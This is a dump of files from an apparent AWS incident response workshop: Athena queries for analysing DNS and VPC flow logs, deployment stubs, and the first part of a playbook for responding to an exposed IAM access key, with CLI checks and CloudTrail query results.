50 | WHERE date_partition >= date_format(date_add('day',-30,current_timestamp), '%Y/%m/%d')
51 | LIMIT 10;
52 | 
53 | -- preview first 10 rows with all fields, limited by a combination of partition constraints
54 | -- NOTE: narrowing the scope of the query as much as possible will improve performance and minimize cost
55 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
56 | WHERE date_partition >= '2020/07/01'
57 | AND date_partition <= '2020/07/31'
58 | AND account_partition = '111122223333'
59 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003')
60 | LIMIT 10;
61 | 
62 | -- ANALYSIS EXAMPLES
63 | 
64 | -- Sort queries by requestor instance count and query count
65 | SELECT query_name, query_type, array_distinct(filter(array_agg(srcids), q -> q.instance IS NOT NULL)) as instances,
66 | cardinality(array_distinct(filter(array_agg(srcids), q -> q.instance IS NOT NULL))) as query_count
67 | FROM "irworkshopgluedatabase"."irworkshopgluetabledns"
68 | WHERE date_partition >= '2020/07/01'
69 | AND date_partition <= '2020/07/31'
70 | AND account_partition = '111122223333'
71 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003')
72 | GROUP BY query_name, query_type
73 | ORDER BY query_count DESC;
74 | 
75 | -- Summary with count of each time a name was queried
76 | SELECT query_name, query_type, count(*) as query_count FROM "irworkshopgluedatabase"."irworkshopgluetabledns"
77 | WHERE date_partition >= '2020/07/01'
78 | AND date_partition <= '2020/07/31'
79 | AND account_partition = '111122223333'
80 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003')
81 | GROUP BY query_name, query_type
82 | ORDER BY query_count DESC;
83 | 
84 | -- Summary with count of each time a non-AAAA record name was queried
85 | SELECT query_name, query_type, count(*) as query_count FROM "irworkshopgluedatabase"."irworkshopgluetabledns"
86 | WHERE query_type <> 'AAAA'
87 | AND date_partition >= '2020/07/01'
88 | AND date_partition <= '2020/07/31'
89 | AND account_partition = '111122223333'
90 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003')
91 | GROUP BY query_name, query_type
92 | ORDER BY query_count DESC;
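-- (Added example) Hypothetical pivot: names queried by one EC2 instance of interest;
-- a minimal sketch assuming the srcids.instance field used above, with a placeholder instance ID
SELECT query_name, query_type, count(*) as query_count
FROM "irworkshopgluedatabase"."irworkshopgluetabledns"
WHERE srcids.instance = 'i-021345abcdef6789'
AND date_partition >= '2020/07/01'
AND date_partition <= '2020/07/31'
AND account_partition = '111122223333'
AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003')
GROUP BY query_name, query_type
ORDER BY query_count DESC;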
93 | 
94 | -- Summary with count of each time a non-AAAA record name was queried,
95 | -- split out by TLD and SLD (note: doesn't properly handle TLDs containing a '.' (e.g. .com.br))
96 | SELECT element_at(split(query_name,'.'),-2) AS tld,
97 | element_at(split(query_name,'.'),-3) AS sld,
98 | query_name, query_type,
99 | count(*) AS query_count
100 | FROM "irworkshopgluedatabase"."irworkshopgluetabledns"
101 | WHERE query_type <> 'AAAA'
102 | AND date_partition >= '2020/07/01'
103 | AND date_partition <= '2020/07/31'
104 | AND account_partition = '111122223333'
105 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003')
106 | GROUP BY query_name, query_type
107 | ORDER BY query_count DESC;
108 | 
109 | -- Get records that resolve to a specific IP
110 | SELECT * FROM "irworkshopgluedatabase"."irworkshopgluetabledns"
111 | WHERE contains(transform(answers, x -> x.rdata), '203.0.113.2')
112 | AND date_partition >= '2020/07/01'
113 | AND date_partition <= '2020/07/31'
114 | AND account_partition = '111122223333'
115 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003');
116 | 
--------------------------------------------------------------------------------
/analytics/vpcflow/vpcflow_demo_queries.sql:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
3 | SPDX-License-Identifier: MIT-0
4 | */
5 | 
6 | -- PREVIEW TABLE
7 | -- preview first 10 rows with all fields, quick way to verify everything is set up correctly
8 | 
9 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
10 | LIMIT 10;
11 | 
12 | -- PARTITION TESTS
13 | /* NOTE: if there are no constraints on a partition (account, region, or date) then by default ALL data will be scanned;
14 | this could lead to a costly query, so always consider using at least one partition constraint.
15 | 
16 | Note that this is the case even if you have other constraints in a query (e.g. sourceaddress = '192.0.2.1'),
17 | only constraints using partition fields (date_partition, region_partition, account_partition)
18 | will limit the amount of data scanned.
19 | */
20 | 
21 | -- preview first 10 rows with all fields, limited to a single account
22 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
23 | WHERE account_partition = '111122223333'
24 | LIMIT 10;
25 | 
26 | -- preview first 10 rows with all fields, limited to multiple accounts
27 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
28 | WHERE account_partition in ('111122223333','444455556666','123456789012')
29 | LIMIT 10;
30 | 
31 | -- preview first 10 rows with all fields, limited to a single region
32 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
33 | WHERE region_partition = 'us-east-1'
34 | LIMIT 10;
35 | 
36 | -- preview first 10 rows with all fields, limited to multiple regions
37 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
38 | WHERE region_partition in ('us-east-1','us-east-2','us-west-2')
39 | LIMIT 10;
40 | 
41 | -- NOTE: date_partition format is 'YYYY/MM/DD' as a string
42 | -- preview first 10 rows with all fields, limited to a certain date range
43 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
44 | WHERE date_partition >= '2020/07/01'
45 | AND date_partition <= '2020/07/31'
46 | LIMIT 10;
47 | 
48 | -- preview first 10 rows with all fields, limited to the past 30 days (relative)
49 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
50 | WHERE date_partition >= date_format(date_add('day',-30,current_timestamp), '%Y/%m/%d')
51 | LIMIT 10;
52 | 
53 | -- preview first 10 rows with all fields, limited by a combination of partition constraints
54 | -- NOTE: narrowing the scope of the query as much as possible will improve performance and minimize cost
55 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
56 | WHERE date_partition >= '2020/07/01'
57 | AND date_partition <= '2020/07/31'
58 | AND account_partition = '111122223333'
59 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
60 | LIMIT 10;
61 | 
62 | -- ANALYSIS EXAMPLES
63 | -- NOTE: default partition constraints have been provided for each query,
64 | -- be sure to add the appropriate partition constraints to the WHERE clause as shown above
65 | /*
66 | DEFAULT partition constraints:
67 | WHERE date_partition >= '2020/07/01'
68 | AND date_partition <= '2020/07/31'
69 | AND account_partition = '111122223333'
70 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
71 | 
72 | Be sure to modify or remove these to fit the scope of your intended analysis
73 | */
74 | 
75 | -- Get a list of source/destination IP pairs ordered by the number of records
76 | SELECT region, instanceid, sourceaddress, destinationaddress, count(*) as record_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
77 | WHERE date_partition >= '2020/07/01'
78 | AND date_partition <= '2020/07/31'
79 | AND account_partition = '111122223333'
80 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
81 | GROUP BY region, instanceid, sourceaddress, destinationaddress
82 | ORDER BY record_count DESC
83 | 
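-- (Added example) Hypothetical triage query: summarize rejected flows by source address and
-- destination port, a quick way to spot scanning; a minimal sketch assuming the action field
-- shown in the flow-direction query below and the DEFAULT partition constraints above
SELECT sourceaddress, destinationaddress, destinationport, count(*) as reject_count
FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
WHERE action = 'REJECT'
AND date_partition >= '2020/07/01'
AND date_partition <= '2020/07/31'
AND account_partition = '111122223333'
AND region_partition in ('us-east-1','us-east-2','us-west-2')
GROUP BY sourceaddress, destinationaddress, destinationport
ORDER BY reject_count DESC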
84 | -- Get a summary of records between a given source/destination IP pair, ordered by the total number of bytes
85 | SELECT region, instanceid, sourceaddress, destinationaddress, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
86 | WHERE (sourceaddress = '192.0.2.1' OR destinationaddress = '192.0.2.1')
87 | AND (sourceaddress = '203.0.113.2' OR destinationaddress = '203.0.113.2')
88 | AND date_partition >= '2020/07/01'
89 | AND date_partition <= '2020/07/31'
90 | AND account_partition = '111122223333'
91 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
92 | GROUP BY region, instanceid, sourceaddress, destinationaddress
93 | ORDER BY byte_count DESC
94 | 
95 | -- Get a summary of the number of bytes sent from port 443 limited to a single instance
96 | -- NOTE: for remote IPs this represents the amount of data downloaded from port 443 by the instance,
97 | -- for instance IPs this represents the amount of data downloaded by remote hosts from the instance on port 443
98 | SELECT region, instanceid, sourceaddress, sourceport, destinationaddress, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
99 | WHERE instanceid = 'i-000000000000000'
100 | AND sourceport = 443
101 | AND date_partition >= '2020/07/01'
102 | AND date_partition <= '2020/07/31'
103 | AND account_partition = '111122223333'
104 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
105 | GROUP BY region, instanceid, sourceaddress, sourceport, destinationaddress
106 | ORDER BY byte_count DESC
107 | 
108 | -- Get a summary of the number of bytes sent to port 443 limited to a single instance
109 | -- NOTE: for remote IPs this represents the amount of data uploaded to port 443 by the instance,
110 | -- for instance IPs this represents the amount of data uploaded by remote hosts to the instance on port 443
111 | SELECT region, instanceid, sourceaddress, destinationaddress, destinationport, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
112 | WHERE instanceid = 'i-000000000000000'
113 | AND destinationport = 443
114 | AND date_partition >= '2020/07/01'
115 | AND date_partition <= '2020/07/31'
116 | AND account_partition = '111122223333'
117 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
118 | GROUP BY region, instanceid, sourceaddress, destinationaddress, destinationport
119 | ORDER BY byte_count DESC
120 | 
121 | -- Get a summary with the number of bytes for each src_ip,src_port,dst_ip,dst_port quad across all records to or from a specific IP
122 | SELECT sourceaddress, destinationaddress, sourceport, destinationport, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
123 | WHERE (sourceaddress = '192.0.2.1' OR destinationaddress = '192.0.2.1')
124 | AND date_partition >= '2020/07/01'
125 | AND date_partition <= '2020/07/31'
126 | AND account_partition = '111122223333'
127 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
128 | GROUP BY sourceaddress, destinationaddress, sourceport, destinationport
129 | ORDER BY byte_count DESC
130 | 
131 | -- Get all flow records between two IPs showing flow_direction (requires v5 flow-direction field to be enabled)
132 | SELECT from_unixtime(starttime) AS start_time,
133 | from_unixtime(endtime) AS end_time,
134 | interfaceid,
135 | sourceaddress,
136 | destinationaddress,
137 | sourceport,
138 | destinationport,
139 | numpackets,
140 | numbytes,
141 | flow_direction,
142 | action
143 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow"
144 | WHERE (sourceaddress = '192.0.2.1'
145 | AND destinationaddress = '192.0.2.254')
146 | OR (sourceaddress = '192.0.2.254'
147 | AND destinationaddress = '192.0.2.1')
148 | ORDER BY starttime ASC
149 | 
150 | -- List when source ips were first seen / last seen with a summary of destination ip/instances/ports
151 | SELECT sourceaddress,
152 | min(starttime) 
AS first_seen, 153 | max(endtime) AS last_seen, 154 | array_agg(DISTINCT(destinationaddress)), 155 | array_agg(DISTINCT(instanceid)), 156 | array_agg(DISTINCT(destinationport)) 157 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 158 | WHERE destinationport < 32768 -- skip ephemeral ports, since we're looking for inbound connections to service ports 159 | AND date_partition >= '2020/07/01' 160 | AND date_partition <= '2020/07/31' 161 | AND account_partition = '111122223333' 162 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 163 | GROUP BY sourceaddress 164 | ORDER by first_seen ASC 165 | 166 | 167 | -- Daily Transfer Report on Top 10 Internal IPs with large transfers, limited to source addresses in network 192.0.2.0/24 168 | SELECT "irworkshopgluedatabase"."irworkshopgluetablevpcflow".event_date, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress, sum("irworkshopgluedatabase"."irworkshopgluetablevpcflow".numbytes) as byte_count 169 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 170 | INNER JOIN (SELECT sourceaddress, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 171 | WHERE sourceaddress like '192.0.2.%' 172 | AND date_partition >= '2020/07/01' 173 | AND date_partition <= '2020/07/31' 174 | AND account_partition = '111122223333' 175 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 176 | GROUP BY region, instanceid, sourceaddress, destinationaddress, destinationport 177 | ORDER BY byte_count DESC 178 | LIMIT 10) as top_n 179 | ON top_n.sourceaddress = "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress 180 | WHERE date_partition >= '2020/07/01' 181 | AND date_partition <= '2020/07/31' 182 | AND account_partition = '111122223333' 183 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 184 | GROUP BY "irworkshopgluedatabase"."irworkshopgluetablevpcflow".event_date, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress 185 | ORDER BY "irworkshopgluedatabase"."irworkshopgluetablevpcflow".event_date ASC, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress ASC, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress ASC, byte_count DESC -------------------------------------------------------------------------------- /app.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 
3 | # SPDX-License-Identifier: MIT-0
4 | 
5 | import aws_cdk
6 | from workshop_stack import WorkshopStack
7 | 
8 | app = aws_cdk.App()
9 | 
10 | workshop_stack = WorkshopStack(app, "WorkshopStack")
11 | 
12 | app.synth()
13 | 
--------------------------------------------------------------------------------
/cdk.json:
--------------------------------------------------------------------------------
1 | {
2 |   "app": "python app.py",
3 |   "context": {
4 |     "@aws-cdk/aws-iam:minimizePolicies": true
5 |   }
6 | }
--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "aws-incident-response-playbooks-workshop",
3 |   "version": "1.0.0",
4 |   "description": "AWS CDK application supporting Incident Response Playbooks Development",
5 |   "main": "setup.js",
6 |   "author": "AWS Professional Services",
7 |   "license": "MIT-0",
8 |   "dependencies": {
9 |     "aws-cdk": "2.128"
10 |   }
11 | }
--------------------------------------------------------------------------------
/playbooks/README.md:
--------------------------------------------------------------------------------
1 | ## Workshop Playbook Samples
2 | 
3 | These playbooks have been created for the purposes of this workshop:
4 | * credential_exposure/IAM_credential_exposure.md - IAM User Access Key publicly exposed
5 | * crypto_mining/EC2_crypto_mining.md - EC2 instance compromised and used for crypto mining
6 |   * the repository contains the simulation script and the "solution" playbook
7 | * template/threat_name.md - generic template to develop a new playbook use case
8 | 
9 | The [NIST Computer Security Incident Handling Guide](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) (Special Publication 800-61 Revision 2) provides guidelines for:
10 | * Preparation for incidents
11 | * Gathering and analyzing evidence from an incident
12 | * Containment, eradication, and recovery from an incident
13 | * Performing post-incident activities after response closure
14 | 
15 | 
16 | 
--------------------------------------------------------------------------------
/playbooks/credential_exposure/IAM_credential_exposure.md:
--------------------------------------------------------------------------------
1 | ---
2 | 
3 | PLEASE NOTE THIS PLAYBOOK USES FICTITIOUS ENTITIES SUCH AS ```AKIAIOSFODNN7EXAMPLE``` FOR *IAM ACCESS KEY ID*, ```198.51.100.77``` FOR *IP ADDRESS*, AND ARBITRARY *DATE RANGES* FOR ATHENA QUERIES AND AWS CLI COMMANDS. YOU WILL NEED TO REPLACE THOSE WITH ACTUALS FROM THE AWS ACCOUNT YOU ARE USING.
4 | 
5 | ---
6 | 
7 | # IAM credential exposure playbook
8 | 
9 | ## Preparation
10 | 
11 | ### The threat
12 | 
13 | This playbook covers the detection of exposed IAM credentials in the form of *IAM Access Keys* or *IAM User and password combinations*. It does not cover the *AWS account root user*. If a non-authorized actor has a copy of those credentials, they can perform any action in your account permitted by the policies associated with those credentials, such as launching an Amazon EC2 instance or storing objects in Amazon S3. Privileges could be escalated either by exploiting vulnerabilities or by misuse of ancillary entitlements. Detective controls for exposed IAM credentials should be defined and implemented based on threat modeling, e.g. notification from a third party, Data Loss Prevention (DLP) systems, or unusual AWS API call activity (deterministic(*) or AI/ML based).
14 | 
15 | (*) Deterministic means using a static rule, e.g. an EC2 RunInstances API call made from an IP address belonging to CIDR 198.51.100.0/24 using permanent access keys with user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246”.
16 | 
17 | ### Objectives
18 | 
19 | Throughout the execution of the playbook, focus on the _***desired outcomes***_, taking notes for enhancement of incident response capabilities.
20 | 
21 | #### Determine:
22 | 
23 | * **Vulnerabilities exploited**
24 | * **Exploits and tools observed**
25 | * **Actor's intent**
26 | * **Actor's attribution**
27 | * **Damage inflicted to the environment and business**
28 | 
29 | #### Recover:
30 | 
31 | * **Return to original and hardened configuration**
32 | 
33 | #### Enhance CAF Security Perspective components:
34 | [AWS Cloud Adoption Framework Security Perspective](https://d0.awsstatic.com/whitepapers/AWS_CAF_Security_Perspective.pdf)
35 | * **Directive**
36 | * **Detective**
37 | * **Responsive**
38 | * **Preventative**
39 | 
40 | ![Image](images/aws_caf.png)
41 | * * *
42 | 
43 | 
44 | ### Response Steps
45 | 
46 | 1. [**ANALYSIS**] Validate the alert by checking ownership of the exposed credential
47 | 2. [**ANALYSIS**] Identify the exposed credential's owner/custodian
48 | 3. [**CONTAINMENT**] Disable the exposed credential if approved by the owner/custodian (see the AWS CLI sketch after this list)
49 | 4. [**ANALYSIS**] Use Athena to pull 15 days of exposed credential activity from CloudTrail logs
50 | 5. [**ANALYSIS**] Use Athena to pull 15 days of source IP addresses used by the exposed credential from VPC Flow logs
51 | 6. [**ANALYSIS**] Establish reputation for source IP addresses
52 | 7. [**ANALYSIS**] Determine which source IP addresses were used against infrastructure resources such as EC2 instances and RDS databases
53 | 8. [**ANALYSIS**] Discover all resources provisioned, modified, and deleted by the exposed credential based on CloudTrail logs
54 | 9. [**CONTAINMENT**] Perform containment of all rogue resources provisioned by the exposed credential
55 | 10. [**CONTAINMENT**] Perform containment of existing resources modified by the exposed credential with approval from the owner/custodian
56 | 11. [**ANALYSIS**] Repeat steps 4 to 10 for IAM principals created by the exposed credential
57 | 12. [**ANALYSIS**] Determine if data was exfiltrated, modified, or deleted. Figure out the classification for all data sets touched.
58 | 13. [**ANALYSIS**] Expand log scope to 90 days or further and repeat steps 1-12. Use your judgment on how far back to go.
59 | 14. [**ANALYSIS**] Estimate attribution and attack type (targeted or opportunistic)
60 | 15. [**ANALYSIS**] Preserve all relevant infrastructure and service resources for forensics investigation
61 | 16. [**ERADICATION**] Perform eradication (delete rogue resources, apply security updates and harden configuration)
62 | 17. [**RECOVERY**] Perform recovery by restoring system data and rebuilding components
63 | 18. [**POST-INCIDENT ACTIVITY**] Perform post-incident activity for preparation enhancement
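A minimal sketch of the containment call in step 3, using the AWS CLI (`aws iam update-access-key` flips the key to Inactive without deleting it, preserving evidence). The access key ID is the playbook's fictitious example; the owning user name is a placeholder you must identify first:

```
aws iam update-access-key \
    --access-key-id AKIAIOSFODNN7EXAMPLE \
    --status Inactive \
    --user-name <owning-iam-user> \
    --profile SecurityBreakGlassRole
```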
64 | 
65 | 
66 | ***The response steps follow the Incident Response Life Cycle from NIST Special Publication 800-61r2
67 | [NIST Computer Security Incident Handling Guide](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf)
68 | ![Image](images/nist_life_cycle.png)***
69 | 
70 | 
71 | ### Incident Classification & Handling
72 | 
73 | * **Tactics, techniques, and procedures**: Exfiltration of credentials
74 | * **Category**: IAM credential exposure
75 | * **Resource**: IAM
76 | * **Roles to Assume**:
77 |   * **SecurityAnalystRole**: provides Athena querying and GuardDuty read-only access
78 |   * **AthenaAdminRole**: configure and maintain Athena
79 |   * **SecurityDeployRole**: deploy AWS CDK app or CloudFormation stacks
80 |   * **SecurityBreakGlassRole**: account administrator, for any incident response related activity requiring elevation upon approval
81 | * **Tooling**: [AWS Command Line Interface](https://docs.aws.amazon.com/cli/latest/index.html) (CLI), [Amazon Athena](https://docs.aws.amazon.com/athena/latest/ug/querying-AWS-service-logs.html)
82 | * **Indicators**: Cyber Threat Intelligence, Third Party Notice
83 | * **Log Sources**: AWS CloudTrail, AWS Config, VPC Flow Logs, Amazon GuardDuty
84 | * **Teams**: Security Operations Center (SOC), Forensic Investigators, Cloud Engineering
85 | 
86 | * * *
87 | 
88 | ### Activity simulated for this playbook
89 | 
90 | The file ```simulation/simulate_credential_exposure_activity.sh``` is a bash script using the AWS CLI to simulate an actor using IAM User Access Keys for reconnaissance, elevation of privileges, and persistence.
91 | 
92 | * * *
93 | 
94 | ### IAM entitlements used for this playbook
95 | 
96 | The following IAM Roles are available in the AWS account to assume:
97 | 
98 | #### SecurityAnalystRole
99 | - For Athena queries: custom IAM Policy
100 | - To perform analysis tasks: [ReadOnlyAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
101 | 
102 | #### SecurityDeployRole
103 | - For resource deployment using CloudFormation
104 | 
105 | #### SecurityBreakGlassRole
106 | - To perform containment and eradication tasks: [AdministratorAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/AdministratorAccess)
107 | 
108 | #### SecurityAdminRole
109 | - To perform security tool administrative tasks such as Athena or GuardDuty administration: custom IAM Policy
110 | 
111 | ## Assuming Roles:
112 | - CloudShell provides a Linux shell environment with temporary credentials for the IAM Role you are currently signed in to the console with. The AWS CLI will use these session tokens by default.
113 | - Alternatively, you can install the AWS CLI on Windows, Linux, or macOS and configure multiple IAM Roles to be assumed using the `--profile` parameter.
114 | 
115 | **All examples in this playbook use the `--profile` parameter to indicate the IAM Role required for the AWS CLI command. If you use CloudShell, remove the `--profile` parameter from the AWS CLI call.**
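A minimal sketch of a named-profile setup for the `--profile` workflow, in `~/.aws/config`; the account ID is the playbook's fictitious 777777777777, and the `default` source profile holding your base credentials is an assumption:

```
[profile SecurityAnalystRole]
role_arn = arn:aws:iam::777777777777:role/SecurityAnalystRole
source_profile = default
region = us-east-1
```

Verify the role is assumable by running `aws sts get-caller-identity --profile SecurityAnalystRole`.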
116 | 
117 | * * *
118 | 
119 | 
120 | ## Incident Handling Process
121 | 
122 | ### The incident response process has the following stages:
123 | 
124 | * Part 1: Analysis - Validation
125 | * Part 2: Analysis - Scope
126 | * Part 3: Analysis - Impact
127 | * Part 4: Containment
128 | * Part 5: Eradication
129 | * Part 6: Recovery
130 | * Part 7: Post-Incident Activity
131 | 
132 | * * *
133 | 
134 | ### Part 1: Analysis - Validation
135 | 
136 | The IAM Access Key with ID AKIAIOSFODNN7EXAMPLE was found in plain text in a public git repository.
137 | 
138 | There are no technical detective controls to validate, therefore, check ownership of the IAM Access Key ID using the AWS CLI:
139 | ```
140 | aws sts get-access-key-info --access-key-id AKIAIOSFODNN7EXAMPLE --profile SecurityAnalystRole --region us-east-1
141 | {
142 |     "Account": "777777777777"
143 | }
144 | ```
145 | 
146 | If AWS account 777777777777 is owned by you, continue to Analysis; otherwise, inform the [AWS Trust and Safety Team](https://aws.amazon.com/premiumsupport/knowledge-center/report-aws-abuse/) of the found IAM Access Key ID.
147 | 
148 | * * *
149 | 
150 | ### Part 2: Analysis - Scope
151 | 
152 | Assume the SecurityAnalystRole on the AWS account hosting the Athena workgroup IRWorkshopWorkgroup.
153 | 
154 | 1. Retrieve the past 7 days of the following activity for IAM Access Key ID AKIAIOSFODNN7EXAMPLE:
155 |    * Service activity (API calls) from CloudTrail logs
156 |    * Infrastructure and application network activity from VPC Flow logs based on the source IP addresses used for API calls
157 | 2. Establish reputation for the source IP address list:
158 |    * Use internal and external threat intelligence
159 |    * Who owns the source IP addresses used?
160 | 3. Using API call history, determine resources created, modified, deleted, and probed
161 | 4. 
Document resource inventory by AWS Service and call made 162 | 163 | #### Athena Queries and AWS CLI calls 164 | 165 | 166 | ``` 167 | -- retrieve past 7 days of API calls 168 | SELECT awsregion, eventsource, eventname, readonly, errorcode, errormessage, count(eventid) as COUNT 169 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 170 | WHERE useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 171 | AND date_partition >= '2021/07/16' 172 | AND date_partition <= '2021/07/24' 173 | GROUP BY awsregion, eventsource, eventname, readonly, errorcode, errormessage 174 | ORDER BY COUNT DESC 175 | ``` 176 | 177 | ``` 178 | awsregion | eventsource | eventname | readonly | errorcode | errormessage | COUNT 179 | -----------|---------------------|---------------------|------------|-------------|----------------|------- 180 | us-east-1 | sts.amazonaws.com | GetCallerIdentity | true | | | 1 181 | us-east-1 | iam.amazonaws.com | AttachUserPolicy | false | | | 1 182 | us-east-1 | iam.amazonaws.com | CreateUser | false | | | 1 183 | us-east-1 | iam.amazonaws.com | CreateAccessKey | false | | | 1 184 | ``` 185 | 186 | 187 | ``` 188 | -- retrieve past 7 days of source IP addresses and user agents used for API calls 189 | SELECT sourceipaddress, useragent, count(eventid) as COUNT 190 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 191 | WHERE useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 192 | AND date_partition >= '2021/07/16' 193 | AND date_partition <= '2021/07/24' 194 | GROUP BY sourceipaddress, useragent 195 | ORDER BY COUNT DESC 196 | ``` 197 | 198 | 199 | sourceipaddress | useragent | COUNT 200 | -----------------|--------------------------------------------------------------------------------------------------|------- 201 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.create-access-key | 1 202 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/sts.get-caller-identity | 1 203 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.attach-user-policy | 1 204 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.create-user | 1 205 | 206 | 207 | ``` 208 | -- retrieve past 7 days of infrastructure and application network activity 209 | SELECT "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, 210 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress, 211 | count(*) as count 212 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 213 | INNER JOIN "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 214 | ON ("irworkshopgluedatabase"."irworkshopgluetablecloudtrail".sourceipaddress = 215 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress) 216 | OR 217 | ("irworkshopgluedatabase"."irworkshopgluetablecloudtrail".sourceipaddress = 218 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress) 219 | WHERE "irworkshopgluedatabase"."irworkshopgluetablecloudtrail".useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 220 | AND "irworkshopgluedatabase"."irworkshopgluetablecloudtrail".date_partition >= '2021/07/16' 221 | AND "irworkshopgluedatabase"."irworkshopgluetablecloudtrail".date_partition <= '2021/07/24' 222 | GROUP BY "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, 223 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress 224 | ORDER BY count DESC 225 | ``` 226 | 227 | ``` 228 | Zero records 
returned. 229 | ``` 230 | 231 | #### Analysis of Athena query results: 232 | 233 | * The actor made changes to services with the API calls AttachUserPolicy, CreateUser, and CreateAccessKey, and probed services using GetCallerIdentity. 234 | 235 | * Source IP address reputation: 236 | * ExoneraTor: the ExoneraTor service maintains a database of IP addresses that have been part of the Tor network. 237 | * https://metrics.torproject.org/exonerator.html?ip=198.51.100.77&timestamp=2021-07-24&lang=en 238 | * Greynoise: 239 | * IP reputation service 240 | * https://www.greynoise.io/viz/query/?gnql=198.51.100.77 241 | * Whois: 242 | * There are several options to acquire WHOIS information; here is one run directly from the CLI for one of the IP addresses: 243 | * ```whois 198.51.100.77``` 244 | * No infrastructure and application network activity was detected. 245 | 246 | #### Additional Athena queries: 247 | 248 | * We need to analyze the changes made with the AttachUserPolicy, CreateUser, and CreateAccessKey API calls. 249 | 250 | ``` 251 | -- retrieve additional information about changes made to the services 252 | SELECT eventtime, awsregion, eventname, requestparameters, responseelements, errorcode, errormessage 253 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 254 | WHERE useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 255 | AND date_partition >= '2021/07/16' 256 | AND date_partition <= '2021/07/24' 257 | AND eventname IN ('AttachUserPolicy', 'CreateUser', 'CreateAccessKey') 258 | ``` 259 | 260 | eventtime | awsregion | eventname | requestparameters | responseelements | errorcode | errormessage 261 | ----------------------|-------------|--------------------|----------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------|-------------- 262 | 2021-07-24T02:22:32Z | us-east-1 | CreateUser | {"userName":"JaneDoe"} | 